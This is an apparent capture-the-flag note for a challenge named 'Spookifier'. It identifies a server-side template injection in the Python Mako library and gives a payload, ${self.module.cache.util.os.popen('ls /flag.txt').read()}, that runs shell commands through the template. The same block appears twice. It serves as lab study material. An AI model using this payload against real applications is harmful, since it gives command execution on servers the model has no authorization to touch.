Spookifier¶
[!bug]
Server-Side Template Injection (STTI) in the Python
makolibrary
⋆。゚☁︎。⋆。 ゚☾ ゚。⋆
[!hint] Payload
Server Side Template Injection - Python - Payloads All The Things
${self.module.cache.util.os.popen('ls /flag.txt').read()}
[!bug]
Server-Side Template Injection (STTI) in the Python
makolibrary
⋆。゚☁︎。⋆。 ゚☾ ゚。⋆
[!hint] Payload
Server Side Template Injection - Python - Payloads All The Things
${self.module.cache.util.os.popen('ls /flag.txt').read()}